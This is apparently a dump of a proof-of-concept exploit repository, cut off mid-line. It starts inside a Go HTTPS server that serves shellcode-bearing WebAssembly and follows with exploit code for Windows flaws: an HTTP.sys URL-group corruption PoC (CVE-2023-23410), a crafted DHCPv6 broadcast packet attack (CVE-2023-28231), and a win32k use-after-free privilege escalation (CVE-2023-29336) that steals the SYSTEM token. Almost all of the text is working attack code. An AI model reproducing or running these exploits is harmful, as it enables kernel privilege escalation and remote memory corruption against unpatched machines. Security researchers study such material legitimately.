| // Send an empty response 139 | w.WriteHeader(http.StatusOK) 140 | return 141 | } 142 | if base == "exp.html" { 143 | if globalFloat == -1 { 144 | fmt.Fprint(w, ` 145 | 146 | 147 | 148 | Refresh Page 149 | 150 | 151 | 152 |

Loading...

153 | 154 | 155 | `) 156 | return 157 | } 158 | content, err := ioutil.ReadFile(p) 159 | if err != nil { 160 | http.Error(w, err.Error(), http.StatusInternalServerError) 161 | return 162 | } 163 | newContent := strings.Replace(string(content), "xxx", fmt.Sprint(globalFloat), -1) 164 | fmt.Println("New content: ", newContent) 165 | fmt.Fprint(w, newContent) 166 | globalFloat = -1 167 | return 168 | } 169 | // fmt.Println(extName) 170 | if extName == ".wasm" { 171 | // 去掉扩展名 172 | nameWithoutExt := strings.TrimSuffix(r.URL.Path, filepath.Ext(r.URL.Path)) 173 | // 去掉前面的"/" 174 | baseName := filepath.Base(nameWithoutExt) 175 | fmt.Printf(baseName) 176 | wasmCodeOk, err := processShellcodeAddr(baseName, wasm_code) 177 | if err != nil { 178 | fmt.Println("发生错误:", err) 179 | panic("处理ShellcodeAddr发生错误") 180 | } 181 | fmt.Println(wasmCodeOk) 182 | wasm, err := wasmtime.Wat2Wasm(wasmCodeOk) 183 | if err != nil { 184 | fmt.Printf("error converting wat to wasm: %v\n", err) 185 | os.Exit(1) 186 | } 187 | fmt.Printf("编译结束") 188 | 189 | w.Header().Set("Content-Type", "application/wasm") 190 | _, err = w.Write([]byte(wasm)) 191 | check(err) 192 | w.(http.Flusher).Flush() 193 | fmt.Printf("flushOK") 194 | return 195 | } 196 | http.ServeFile(w, r, p) 197 | } 198 | func main() { 199 | port := flag.String("p", "443", "port to serve on") 200 | directory := flag.String("d", ".", "the directory of static file to host") 201 | flag.Parse() 202 | fmt.Printf("path %s\n", *directory) 203 | http.HandleFunc("/favicon.ico", faviconHandler) 204 | http.HandleFunc("/", fileServerHandler) 205 | log.Printf("Begin Serving %s on HTTP port: %s\n", *directory, *port) 206 | log.Fatal(http.ListenAndServeTLS(":443", "server.pem", "key.pem", nil)) 207 | } 208 | -------------------------------------------------------------------------------- /CVE-2023-23410/CVE-2023-23410_poc.c: -------------------------------------------------------------------------------- 1 | #define SECURITY_WIN32 2 | #include 3 | 
#include 4 | #include 5 | #pragma warning(disable:4127) // condition expression is constant 6 | 7 | int 8 | __cdecl 9 | wmain( 10 | int argc, 11 | __in_ecount(argc) wchar_t* argv[] 12 | ) 13 | { 14 | 15 | int i; 16 | HANDLE hReqQueue = NULL; 17 | HTTPAPI_VERSION HttpApiVersion = HTTPAPI_VERSION_2; 18 | HTTP_SERVER_SESSION_ID ssID = HTTP_NULL_ID; 19 | 20 | HTTP_BINDING_INFO BindingProperty; 21 | HTTP_TIMEOUT_LIMIT_INFO CGTimeout; 22 | ULONG retCode; 23 | HTTP_URL_GROUP_ID urlGroupId = HTTP_NULL_ID; 24 | 25 | 26 | // 27 | // Initialize HTTP APIs. 28 | // 29 | 30 | retCode = HttpInitialize( 31 | HttpApiVersion, 32 | HTTP_INITIALIZE_SERVER, // Flags 33 | NULL // Reserved 34 | ); 35 | 36 | if (retCode != NO_ERROR) 37 | { 38 | wprintf(L"HttpInitialize failed with %lu \n", retCode); 39 | return retCode; 40 | } 41 | 42 | // 43 | // Create a server session handle 44 | // 45 | 46 | retCode = HttpCreateServerSession(HttpApiVersion, 47 | &ssID, 48 | 0); 49 | 50 | 51 | if (retCode != NO_ERROR) 52 | { 53 | wprintf(L"HttpCreateServerSession failed with %lu \n", retCode); 54 | return; 55 | } 56 | // 57 | // Create UrlGroup handle 58 | // 59 | 60 | retCode = HttpCreateUrlGroup(ssID, 61 | &urlGroupId, 62 | 0); 63 | 64 | 65 | if (retCode != NO_ERROR) 66 | { 67 | wprintf(L"HttpCreateUrlGroup failed with %lu \n", retCode); 68 | return; 69 | } 70 | 71 | ULONGLONG data1[4] = { 0 }; 72 | ULONGLONG data3[0x21] = { 0 }; 73 | ULONGLONG data[0x1000] = { 0 }; 74 | BYTE data_temp1[0x1000] = { 0 }; 75 | DWORD return_len = 0; 76 | 77 | WCHAR* str = HeapAlloc(GetProcessHeap(), 0, 0xfffffe0); 78 | WCHAR str_test[0xfffe] = L"192.168.205.155:8081"; 79 | memcpy(str, str_test, 0x20); 80 | 81 | data1[0] = 0x01; 82 | data1[1] = str; 83 | data1[2] = 0xfffffe0-0xf0f0f0; 84 | 85 | for (int i = 0; i < 0x11; i++) 86 | { 87 | data3[i] = data1; 88 | } 89 | data[5] = 0x20; 90 | data[3] = 0x0c; 91 | data[2] = 0x11; 92 | data[0] = 0x1; 93 | data[1] = data3; 94 | 95 | retCode = HttpSetUrlGroupProperty(urlGroupId, 
HttpServerChannelBindProperty,&data,0x20); 96 | 97 | retCode = HttpQueryUrlGroupProperty(urlGroupId,HttpServerChannelBindProperty,&data_temp1,0x140, &return_len); 98 | 99 | 100 | } 101 | 102 | -------------------------------------------------------------------------------- /CVE-2023-28231/CVE-2023-28231-DHCP-VUL-PoC.cpp: -------------------------------------------------------------------------------- 1 |  2 | #include 3 | #include 4 | #include 5 | 6 | #pragma comment(lib, "Ws2_32.lib") 7 | 8 | int main() { 9 | char data[] = 10 | "\x0c\x03\xa4\xf2\x00\x08\x00\x02\x00\x00\x00\x01\x00\x0e\x00\x01" 11 | "\x00\x01\x2b\x07\x5b\xc1\x00\x0c\x29\xe8\x6b\x79\x00\x03\x00\x0c" 12 | "\x07\x00" 13 | 14 | 15 | 16 | 17 | "\x00\x09\x00\x86\x0c\x02"//0x3a+0x26*2 18 | 19 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 20 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 21 | 22 | "\x00\x09\x00\x60\x0c\x02"//0x3a+0x26 23 | 24 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 25 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 26 | 27 | "\x00\x09\x00\x3a\x0c\x01" 28 | 29 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 30 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 31 | 32 | "\x00\x09\x00\x14\x01\x07\x00\x00" 33 | "\x00\x02\x00\x04\x01\x07\x00\x00" 34 | "\x00\x01\x00\x04\x01\x07\x00\x00" 35 | 36 | ; 37 | 38 | char par1[] = 39 | "\x00\x09\x0a\x9b\x0c\x01" 40 | "\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00" 41 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 42 | char par2[] = 43 | "\x00\x09\x00\x14\x01\x07\x00\x00" 44 | "\x00\x02\x00\x04\x01\x07\x00\x00" 45 | "\x00\x01\x00\x04\x01\x07\x00\x00" 46 | ; 47 | 48 | 49 | 50 | char data1[0x1000] = 51 | "\x0c\x20\xa4\xf2\x00\x08\x00\x02\x00\x00\x00\x01\x00\x0e\x00\x01" 52 | "\x00\x01\x2b\x07\x5b\xc1\x00\x0c\x29\xe8\x6b\x79\x00\x03\x00\x0c" 53 | "\x07\x00" 54 | 55 | ; 56 | 57 | int 
num = 0x1f; 58 | int total_len = 0x14 + 0x26 * (num+1); 59 | for (int i = 0; i <= num; i++) 60 | { 61 | memset(par1 + 5, num - i, 1); 62 | short temp = htons(total_len - i * 0x26); 63 | 64 | memcpy(par1 + 2, &temp, 2); 65 | memcpy(data1 + 0x22 + 0x26 * i, par1, 0x26); 66 | if (i == num) 67 | { 68 | memcpy(data1 + 0x22 + 0x26 * i + 0x26, par2, 0x18); 69 | } 70 | 71 | } 72 | int sendlenth = 0x26 * (num+1) + 0x22 + 0x18; 73 | // 初始化 Winsock 74 | WSADATA wsaData; 75 | int result = WSAStartup(MAKEWORD(2, 2), &wsaData); 76 | if (result != 0) { 77 | std::cerr << "WSAStartup failed with error: " << result << std::endl; 78 | return 1; 79 | } 80 | 81 | // 创建套接字 82 | SOCKET sock = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP); 83 | if (sock == INVALID_SOCKET) { 84 | std::cerr << "Failed to create socket: " << WSAGetLastError() << std::endl; 85 | WSACleanup(); 86 | return 1; 87 | } 88 | 89 | // 设置套接字选项,允许发送广播 90 | int optVal = 1; 91 | if (setsockopt(sock, IPPROTO_IPV6, IPV6_MULTICAST_LOOP, (char*)&optVal, sizeof(optVal)) == SOCKET_ERROR) { 92 | std::cerr << "Failed to set socket option: " << WSAGetLastError() << std::endl; 93 | closesocket(sock); 94 | WSACleanup(); 95 | return 1; 96 | } 97 | 98 | // 构建 DHCPv6 广播地址 99 | sockaddr_in6 destAddr = { 0 }; 100 | destAddr.sin6_family = AF_INET6; 101 | destAddr.sin6_port = htons(547); // DHCPv6 默认端口号为 547 102 | InetPton(AF_INET6, L"ff02::1:2", &destAddr.sin6_addr); // DHCPv6 广播地址为 ff02::1:2 103 | 104 | // 发送 DHCPv6 广播消息 105 | int sendResult = 0; 106 | for (int i = 0; i < 0x10; i++) 107 | { 108 | sendResult = sendto(sock, data1, sendlenth, 0, (sockaddr*)&destAddr, sizeof(destAddr)); 109 | } 110 | 111 | int m = GetLastError(); 112 | if (sendResult == SOCKET_ERROR) { 113 | std::cerr << "Failed to send data: " << WSAGetLastError() << std::endl; 114 | closesocket(sock); 115 | WSACleanup(); 116 | return 1; 117 | } 118 | 119 | std::cout << "DHCPv6 Broadcast message sent!" 
<< std::endl; 120 | 121 | // 清理资源 122 | closesocket(sock); 123 | WSACleanup(); 124 | 125 | return 0; 126 | } 127 | -------------------------------------------------------------------------------- /CVE-2023-29336/poc.cpp: -------------------------------------------------------------------------------- 1 | 2 | // writeup link: https://www.numencyber.com/cve-2023-29336-win32k-analysis/ 3 | 4 | #include 5 | //windows server 2016 Datacenter update patch in May 6 | #include 7 | #include 8 | 9 | #define IDM_MYMENU 101 10 | #define IDM_EXIT 102 11 | #define IDM_DISABLE 0xf120 12 | #define IDM_ENABLE 104 13 | #define EPROCESS_UNIQUE_PROCESS_ID_OFFSET 0x440 14 | #define EPROCESS_ACTIVE_PROCESS_LINKS_OFFSET 0x448 15 | #define EPROCESS_TOKEN_OFFSET 0x4b8 16 | 17 | typedef DWORD64(NTAPI* NtUserEnableMenuItem)(HMENU hMenu, UINT uIDEnableItem, UINT uEnable); 18 | 19 | typedef DWORD64(NTAPI* NtUserSetClassLongPtr)(HWND a1, unsigned int a2, unsigned __int64 a3, unsigned int a4); 20 | typedef DWORD64(NTAPI* NtUserCreateAcceleratorTable)(void* Src, int a2); 21 | typedef DWORD64(NTAPI* fnNtUserConsoleControl)(int nConsoleCommand, PVOID, int nConsoleInformationLength); 22 | 23 | 24 | NtUserSetClassLongPtr g_NtUserSetClassLongPtr = NULL; 25 | NtUserEnableMenuItem g_NtUserEnableMenuItem = NULL; 26 | NtUserCreateAcceleratorTable g_NtUserCreateAcceleratorTable = NULL; 27 | fnNtUserConsoleControl g_pfnNtUserConsoleControl = nullptr; 28 | LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam); 29 | int syytem(); 30 | typedef struct _SHELLCODE { 31 | DWORD reserved; 32 | DWORD pid; 33 | DWORD off_THREADINFO_ppi; 34 | DWORD off_EPROCESS_ActiveLink; 35 | DWORD off_EPROCESS_Token; 36 | BOOL bExploited; 37 | BYTE pfnWindProc[]; 38 | } SHELLCODE, * PSHELLCODE; 39 | struct tagMENU 40 | { 41 | ULONG64 field_0; 42 | ULONG64 field_8; 43 | ULONG64 field_10; 44 | ULONG64 field_18; 45 | ULONG64 field_20; 46 | PVOID obj28; 47 | DWORD field_30; 48 | DWORD flag1; 49 | DWORD flag2; 
50 | DWORD cxMenu; 51 | DWORD cyMenu; 52 | ULONG64 field_48; 53 | PVOID rgItems; 54 | ULONG64 field_58; // + 0x58 55 | ULONG64 field_60; 56 | ULONG64 field_68; 57 | ULONG64 field_70; 58 | ULONG64 field_78; 59 | ULONG64 field_80; 60 | ULONG64 field_88; 61 | ULONG64 field_90; 62 | PVOID ref; // + 0x98 63 | }; 64 | struct MyData 65 | { 66 | BYTE name[0x96]; 67 | }; 68 | tagMENU* g_pFakeMenu = 0; 69 | static PSHELLCODE pvShellCode = NULL; 70 | HMENU hSystemMenu; 71 | HMENU hMenu; 72 | HMENU hSubMenu; 73 | HMENU hAddedSubMenu; 74 | HMENU hMenuB; 75 | PVOID MENU_add = 0; 76 | DWORD flag = 0; 77 | UINT iWindowCount = 0x100; 78 | HWND HWND_list[0x300]; 79 | HWND HWND_list1[0x20]; 80 | HMENU HMENUL_list[0x300]; 81 | int Hwnd_num = 0; 82 | int Hwnd_num1 = 0; 83 | ULONGLONG HWND_add = 0; 84 | ULONGLONG GS_off = 0; 85 | WORD max = 0; 86 | 87 | static PULONGLONG ptagWNDFake = NULL; 88 | static PULONGLONG ptagWNDFake1 = NULL; 89 | static PULONGLONG ptagWNDFake2 = NULL; 90 | 91 | static PULONGLONG GS_hanlde = NULL; 92 | 93 | static PULONGLONG HWND_class = NULL; 94 | 95 | 96 | struct ThreadParams { 97 | int threadId; 98 | int numLoops; 99 | }; 100 | 101 | 102 | static unsigned long long GetGsValue(unsigned long long gsValue) 103 | { 104 | return gsValue; 105 | } 106 | PVOID 107 | GetMenuHandle(HMENU menu_D) 108 | { 109 | int conut = 0; 110 | PVOID HANDLE = 0; 111 | PBYTE add = 0; 112 | WORD temp = 0; 113 | DWORD offset = 0xbd688; 114 | HMODULE hModule = LoadLibraryA("USER32.DLL"); 115 | 116 | PBYTE pfnIsMenu = (PBYTE)GetProcAddress(hModule, "IsMenu"); 117 | ULONGLONG par1 = 0; 118 | DWORD par2 = 0; 119 | memcpy((VOID*)&par1, (char*)((ULONGLONG)hModule + offset), 0x08); 120 | memcpy((VOID*)&par2, (char*)((ULONGLONG)hModule + offset + 0x08), 0x02); 121 | 122 | add = (PBYTE)(par1 + 0x18 * (WORD)menu_D); 123 | 124 | if (add) 125 | { 126 | HANDLE = *(PVOID*)add; 127 | } 128 | else 129 | { 130 | HANDLE = 0; 131 | } 132 | HANDLE= (PVOID*)((ULONGLONG)HANDLE - GS_off+0x20); 133 | return 
*(PVOID*)HANDLE; 134 | 135 | } 136 | 137 | PVOID 138 | xxGetHMValidateHandle(HMENU menu_D, DWORD type_hanlde) 139 | { 140 | int conut = 0; 141 | PVOID HANDLE = 0; 142 | PBYTE add = 0; 143 | WORD temp = 0; 144 | DWORD offset = 0xbd688; 145 | HMODULE hModule = LoadLibraryA("USER32.DLL"); 146 | 147 | PBYTE pfnIsMenu = (PBYTE)GetProcAddress(hModule, "IsMenu"); 148 | ULONGLONG par1 = 0; 149 | DWORD par2 = 0; 150 | memcpy((VOID*)&par1, (char*)((ULONGLONG)hModule + offset), 0x08); 151 | memcpy((VOID*)&par2, (char*)((ULONGLONG)hModule + offset + 0x08), 0x02); 152 | 153 | temp = (ULONGLONG)menu_D >> 16; 154 | add = (PBYTE)(par1 + 0x18 * (WORD)menu_D); 155 | if (add) 156 | { 157 | HANDLE = *(PVOID*)add; 158 | } 159 | else 160 | { 161 | HANDLE = 0; 162 | } 163 | HANDLE = (PVOID*)((ULONGLONG)HANDLE - GS_off + 0x20); 164 | return *(PVOID*)HANDLE; 165 | 166 | } 167 | 168 | 169 | static 170 | VOID 171 | xxReallocPopupMenu(VOID) 172 | { 173 | for (INT i = 0; i < 0x8; i++) 174 | { 175 | WNDCLASSEXW Class = { 0 }; 176 | WCHAR szTemp[0x100] = { 0 }; 177 | HWND hwnd = NULL; 178 | wsprintfW(szTemp, L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@A%d", i); 179 | Class.cbSize = sizeof(WNDCLASSEXA); 180 | Class.lpfnWndProc = DefWindowProcW; 181 | Class.cbWndExtra = 0; 182 | Class.hInstance = GetModuleHandleA(NULL); 183 | Class.lpszMenuName = NULL; 184 | Class.lpszClassName = szTemp; 185 | if (!RegisterClassExW(&Class)) 186 | { 187 | continue; 188 | } 189 | } 190 | 191 | } 192 | VOID 193 | createclass(VOID) 194 | { 195 | WCHAR szTemp[0x100] = { 0 }; 196 | for (INT i = 9; i < 29; i++) 197 | { 198 | WNDCLASSEXW Class = { 0 }; 199 | 200 | HWND hwnd = NULL; 201 | wsprintfW(szTemp, L"A@A%d", i); 202 | Class.cbSize = sizeof(WNDCLASSEXA); 203 | Class.lpfnWndProc = DefWindowProcW; 204 | Class.cbWndExtra = 0x20; 205 | Class.hInstance = GetModuleHandleA(NULL); 206 | Class.lpszMenuName = NULL; 207 | Class.lpszClassName = szTemp; 208 | Class.cbClsExtra = 0x1a0; 209 | if 
(!RegisterClassExW(&Class)) 210 | { 211 | continue; 212 | } 213 | } 214 | 215 | for (INT i = 9; i < 29; i++) 216 | { 217 | wsprintfW(szTemp, L"A@A%d", i); 218 | HWND_list1[i]=CreateWindowEx(NULL, szTemp, NULL, WS_VISIBLE, 0, 0, 0, 0, NULL,NULL, NULL, NULL); 219 | 220 | 221 | } 222 | 223 | } 224 | 225 | ULONG64 Read64(ULONG64 address) 226 | { 227 | MENUBARINFO mbi = { 0 }; 228 | mbi.cbSize = sizeof(MENUBARINFO); 229 | 230 | g_pFakeMenu->rgItems = PVOID(address - 0x48); 231 | GetMenuBarInfo(HWND_list[max+1], OBJID_MENU, 1, &mbi); 232 | 233 | return (unsigned int)mbi.rcBar.left + ((ULONGLONG)mbi.rcBar.top << 32); 234 | } 235 | void exploit() 236 | { 237 | for (int i = 0; i < 0x20; i++) 238 | { 239 | 240 | ULONG64 pmenu = SetClassLongPtr(HWND_list1[i], 0x270, (LONG_PTR)g_pFakeMenu); 241 | if (pmenu != 0) 242 | { 243 | Hwnd_num = i; 244 | MENUBARINFO mbi = { 0 }; 245 | mbi.cbSize = sizeof(MENUBARINFO); 246 | 247 | 248 | 249 | } 250 | } 251 | 252 | 253 | // Token stealing 254 | ULONG64 p = Read64(HWND_add +0x250+ 0x10); // USER_THREADINFO 255 | p = Read64(p); //THREADINFO 256 | p = Read64(p + 0x220); // (PROCESSINFO) 257 | 258 | ULONG64 eprocess = p; 259 | printf("Current EPROCESS = %llx\n", eprocess); 260 | p = Read64(p + 0x2f0); 261 | 262 | do { 263 | 264 | p = Read64(p + 0x08); 265 | ULONG64 pid = Read64(p - 0x08); 266 | if (pid == 4) { 267 | 268 | ULONG64 pSystemToken = Read64(p + 0x68); 269 | printf("pSys/tem Token = %llx \n", pSystemToken); 270 | 271 | HWND_class = (PULONGLONG)((PBYTE)0x303000); 272 | HWND_class[8] = eprocess + 0x290; 273 | HWND_class[12] = 0x100; 274 | HWND_class[20] = 0x303010; 275 | 276 | ULONG64 ret_add = SetClassLongPtr(HWND_list1[Hwnd_num], 0x250 + 0x98 - 0xa0, (LONG_PTR)HWND_class); 277 | SetClassLongPtr(HWND_list[max + 1], 0x28, pSystemToken); 278 | ret_add = SetClassLongPtr(HWND_list1[Hwnd_num], 0x250 + 0x98 - 0xa0, (LONG_PTR)ret_add); 279 | 280 | break; 281 | } 282 | } while (p != eprocess); 283 | syytem(); 284 | } 285 | 286 | 287 | void 
buildmem() 288 | { 289 | 290 | WORD max_handle = 0; 291 | pvShellCode = (PSHELLCODE)VirtualAlloc((PVOID)0x300000, 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 292 | if (pvShellCode == NULL) 293 | { 294 | return; 295 | } 296 | ZeroMemory(pvShellCode, 0x10000); 297 | 298 | 299 | 300 | ptagWNDFake = (PULONGLONG)((PBYTE)0x304140); 301 | ptagWNDFake[0] = (ULONGLONG)0x304140; 302 | 303 | ptagWNDFake[2] = (ULONGLONG)0x304140 + 0x10; 304 | 305 | 306 | 307 | ptagWNDFake[6] = (ULONGLONG)0x304140; 308 | ptagWNDFake[8] = 0x305300; 309 | 310 | ptagWNDFake[11] = (ULONGLONG)MENU_add; 311 | ptagWNDFake[68] = (ULONGLONG)0x304140 + 0x230; 312 | ptagWNDFake[69] = (ULONGLONG)0x304140 + 0x28; 313 | ptagWNDFake[70] = (ULONGLONG)0x304140 + 0x30; 314 | ptagWNDFake[71] = (ULONGLONG)0x000004; 315 | 316 | 317 | ptagWNDFake1 = (PULONGLONG)((PBYTE)0x305300); 318 | ptagWNDFake1[1] = (ULONGLONG)0x11; 319 | ptagWNDFake1[2] = (ULONGLONG)0x305320; 320 | ptagWNDFake1[6] = (ULONGLONG)0x1000000000020000; 321 | ptagWNDFake1[8] = (ULONGLONG)0x00000000029d0000; 322 | ptagWNDFake1[11] = (ULONGLONG)HWND_add + 0x63 - 0x120; 323 | 324 | 325 | ptagWNDFake1[14] = (ULONGLONG)0x306500; 326 | ptagWNDFake1[16] = (ULONGLONG)305400; 327 | 328 | 329 | ptagWNDFake2 = (PULONGLONG)((PBYTE)0x306500); 330 | ptagWNDFake1[11] = (ULONGLONG)0x306600; 331 | 332 | 333 | 334 | WNDCLASSEX WndClass = { 0 }; 335 | WndClass.cbSize = sizeof(WNDCLASSEX); 336 | WndClass.lpfnWndProc = DefWindowProc; 337 | WndClass.style = CS_VREDRAW | CS_HREDRAW; 338 | WndClass.cbWndExtra = 0xe0; 339 | WndClass.hInstance = NULL; 340 | WndClass.lpszMenuName = NULL; 341 | WndClass.lpszClassName = L"NormalClass"; 342 | 343 | RegisterClassEx(&WndClass); 344 | 345 | for (int i = 0; i < 0x200; i++) 346 | { 347 | HMENUL_list[i] = CreateMenu(); 348 | } 349 | for (int i = 0; i < 0x100; i++) 350 | { 351 | HWND_list[i] = CreateWindowEx(NULL, L"NormalClass", NULL, WS_VISIBLE, 0, 0, 0, 0, NULL, HMENUL_list[i], NULL, NULL); 352 | 353 | } 354 | for (int 
i = 0; i < 0x100; i++) 355 | { 356 | 357 | 358 | SetWindowLongPtr(HWND_list[i], 0x58, (LONG_PTR)0x0002080000000000); 359 | 360 | SetWindowLongPtr(HWND_list[i], 0x80, (LONG_PTR)0x0000303030000000); 361 | 362 | } 363 | 364 | 365 | for (int i = 0x20; i < 0x60; i++) 366 | { 367 | if ((ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2], 0x01)- (ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2 - 1], 0x01)== 0x250) 368 | { 369 | if ((ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2 + 1], 0x01)-(ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2], 0x01) == 0x250) 370 | { 371 | HWND_add = (ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i*2], 0x01); 372 | max = i * 2; 373 | break; 374 | } 375 | } 376 | if (i == 0x5f) 377 | { 378 | HWND_add = 0; 379 | } 380 | 381 | } 382 | 383 | ptagWNDFake1[11] = (ULONGLONG)HWND_add + 0x63 - 0x120; 384 | 385 | 386 | DestroyWindow(HWND_list[max]); 387 | 388 | createclass(); 389 | 390 | 391 | 392 | // Create a fake spmenu 393 | PVOID hHeap = (PVOID)0x302000; 394 | 395 | g_pFakeMenu = (tagMENU*)(PVOID)0x302000; 396 | g_pFakeMenu->ref = (PVOID)0x302300; 397 | *(PULONG64)g_pFakeMenu->ref = (ULONG64)g_pFakeMenu; 398 | // cItems = 1 399 | g_pFakeMenu->obj28 = (PVOID)0x302200; 400 | *(PULONG64)((PBYTE)g_pFakeMenu->obj28 + 0x2C) = 1; 401 | // rgItems 402 | g_pFakeMenu->rgItems = (PVOID)0x304000; 403 | // cx / cy must > 0 404 | g_pFakeMenu->flag1 = 1; 405 | g_pFakeMenu->flag2 = 1; 406 | g_pFakeMenu->cxMenu = 1; 407 | g_pFakeMenu->cyMenu = 1; 408 | 409 | 410 | // 411 | 412 | } 413 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) 414 | { 415 | ULONGLONG gsValue = 0; 416 | unsigned char shellcode[] = "\x65\x48\x8B\x04\x25\x30\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\xc3"; 417 | 418 | LPVOID executableMemory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 419 | if (executableMemory == NULL) { 420 | return 1; 421 | } 422 | 
memcpy(executableMemory, shellcode, sizeof(shellcode)); 423 | 424 | gsValue = ((ULONGLONG(*)())executableMemory)(); 425 | gsValue = gsValue + 0x800; 426 | GS_hanlde = (PULONGLONG)(PBYTE)gsValue; 427 | GS_off = GS_hanlde[5]; 428 | 429 | char str[0xb8] = ""; 430 | memset(str, 0x41, 0xa8); 431 | g_NtUserEnableMenuItem = (NtUserEnableMenuItem)GetProcAddress(GetModuleHandleA("win32u.dll"), "NtUserEnableMenuItem"); 432 | g_NtUserSetClassLongPtr = (NtUserSetClassLongPtr)GetProcAddress(GetModuleHandleA("win32u.dll"), "NtUserSetClassLongPtr"); 433 | g_NtUserCreateAcceleratorTable = (NtUserCreateAcceleratorTable)GetProcAddress(GetModuleHandleA("win32u.dll"), "NtUserCreateAcceleratorTable"); 434 | g_pfnNtUserConsoleControl = (fnNtUserConsoleControl)GetProcAddress(GetModuleHandleA("win32u.dll"), "NtUserConsoleControl"); 435 | 436 | WNDCLASS wc = { 0 }; 437 | 438 | wc.lpfnWndProc = WndProc; 439 | wc.hInstance = hInstance; 440 | wc.lpszClassName = TEXT("EnableMenuItem"); 441 | 442 | RegisterClass(&wc); 443 | 444 | HWND hWnd = CreateWindow( 445 | wc.lpszClassName, 446 | TEXT("EnableMenuItem"), 447 | WS_OVERLAPPEDWINDOW, 448 | CW_USEDEFAULT, 449 | CW_USEDEFAULT, 450 | 400, 300, 451 | NULL, 452 | NULL, 453 | hInstance, 454 | NULL 455 | ); 456 | 457 | if (!hWnd) return FALSE; 458 | 459 | /// 460 | 461 | 462 | hSystemMenu = GetSystemMenu(hWnd, FALSE); 463 | 464 | hSubMenu = CreatePopupMenu(); 465 | MENU_add = GetMenuHandle(hSubMenu); 466 | hMenuB = CreateMenu(); 467 | 468 | buildmem(); 469 | if (HWND_add == 0) 470 | { 471 | return 0; 472 | } 473 | 474 | 475 | AppendMenu(hSubMenu, MF_STRING, 0x2061, TEXT("0")); 476 | AppendMenu(hSubMenu, MF_STRING, 0xf060, TEXT("1")); 477 | 478 | DeleteMenu(hSystemMenu, SC_CLOSE, MF_BYCOMMAND); 479 | 480 | AppendMenu(hMenuB, MF_POPUP, (UINT_PTR)hSubMenu, L"Menu A"); 481 | 482 | AppendMenu(hSystemMenu, MF_POPUP, (UINT_PTR)hMenuB, L"Menu B"); 483 | 484 | 485 | 486 | ShowWindow(hWnd, nCmdShow); 487 | UpdateWindow(hWnd); 488 | 489 | flag = 1; 490 | 
g_NtUserEnableMenuItem(hSystemMenu, 0xf060, 0x01); 491 | 492 | exploit(); 493 | 494 | MSG msg = { 0 }; 495 | 496 | while (GetMessage(&msg, NULL, 0, 0)) 497 | { 498 | TranslateMessage(&msg); 499 | DispatchMessage(&msg); 500 | } 501 | 502 | return (int)msg.wParam; 503 | } 504 | 505 | LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam) 506 | { 507 | switch (message) 508 | { 509 | case WM_DESTROY: 510 | PostQuitMessage(0); 511 | return 0; 512 | case 0xae: 513 | switch (wParam) 514 | { 515 | case 0x1000: 516 | if (flag) 517 | { 518 | int itemCount = GetMenuItemCount(hMenuB); 519 | 520 | for (int i = itemCount - 1; i >= 0; i--) { 521 | RemoveMenu(hMenuB, i, MF_BYPOSITION); 522 | } 523 | DestroyMenu(hSubMenu); 524 | xxReallocPopupMenu(); 525 | } 526 | case 0x1001: 527 | if (flag) 528 | { 529 | int itemCount = GetMenuItemCount(hMenuB); 530 | 531 | for (int i = itemCount - 1; i >= 0; i--) { 532 | RemoveMenu(hMenuB, i, MF_BYPOSITION); 533 | } 534 | DestroyMenu(hSubMenu); 535 | xxReallocPopupMenu(); 536 | } 537 | 538 | return 0; 539 | } 540 | break; 541 | 542 | 543 | } 544 | 545 | return DefWindowProc(hWnd, message, wParam, lParam); 546 | } 547 | int syytem() 548 | { 549 | SECURITY_ATTRIBUTES sa; 550 | HANDLE hRead, hWrite; 551 | byte buf[40960] = { 0 }; 552 | STARTUPINFOW si; 553 | PROCESS_INFORMATION pi; 554 | DWORD bytesRead; 555 | RtlSecureZeroMemory(&si, sizeof(si)); 556 | RtlSecureZeroMemory(&pi, sizeof(pi)); 557 | RtlSecureZeroMemory(&sa, sizeof(sa)); 558 | int br = 0; 559 | sa.nLength = sizeof(SECURITY_ATTRIBUTES); 560 | sa.lpSecurityDescriptor = NULL; 561 | sa.bInheritHandle = TRUE; 562 | if (!CreatePipe(&hRead, &hWrite, &sa, 0)) 563 | { 564 | return -3; 565 | } 566 | 567 | si.cb = sizeof(STARTUPINFO); 568 | GetStartupInfoW(&si); 569 | si.hStdError = hWrite; 570 | si.hStdOutput = hWrite; 571 | si.wShowWindow = SW_HIDE; 572 | si.lpDesktop = L"WinSta0\\Default"; 573 | si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; 574 | wchar_t 
